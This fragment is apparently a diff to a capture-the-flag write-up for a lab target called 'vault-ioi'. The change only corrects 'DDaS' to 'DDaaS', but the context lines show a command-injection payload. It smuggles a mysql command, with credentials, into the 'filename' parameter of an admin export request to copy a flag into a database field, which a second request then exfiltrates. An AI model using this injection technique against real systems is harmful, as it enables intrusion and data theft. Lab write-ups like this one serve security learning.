blnknlights/blnknlights.github.io/htb/ctf/vault-ioi/vault-ioi.md

 GET /admin/export?filename=ioivault_dump;mysql -h 127.0.0.1 -uioi_vault -pioi_vault -Dioi_vault -e "update saved_passwords set note='$(/readflag)' where owner='admin';"; HTTP/1.1
 ```

-And we just have to use our database dumping as a service (DDaS) for the exfiltration
+And we just have to use our database dumping as a service (DDaaS) for the exfiltration
 ```
 GET /admin/export?filename=ioivault_dump HTTP/1.1
 ```